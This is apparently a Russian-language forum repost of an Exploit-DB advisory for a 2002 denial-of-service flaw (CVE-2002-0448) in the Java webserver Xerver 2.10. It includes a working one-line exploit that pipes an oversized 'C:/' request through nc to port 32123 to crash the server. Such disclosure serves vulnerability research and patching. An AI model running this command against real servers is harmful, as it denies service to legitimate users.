Exploit Xerver 2.10 - Multiple Request Denial of Service Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21336
Проверка EDB
  1. Пройдено
Автор
ALEX HERNANDEZ
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2002-0448
Дата публикации
2002-03-08
Код:
source: https://www.securityfocus.com/bid/4254/info

Xerver is a freely available webserver, written in Java. It will run on any operating system with Java installed, including Microsoft Windows, Unix/Linux variants, MacOS, etc.

It has been reported that sending an excessive number of requests for 'C:\' to port 32123 will cause the webserver to crash, denying service to legitimate users. This appears to be the case even on non-Windows based operating systems running the vulnerable software.

The webserver will need to be restarted to regain normal functionality.

This issue was reported for v2.10 of Xerver. Earlier versions may also be affected.


printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" |nc -vvn 127.0.0.1 32123
 
Источник
www.exploit-db.com

Похожие темы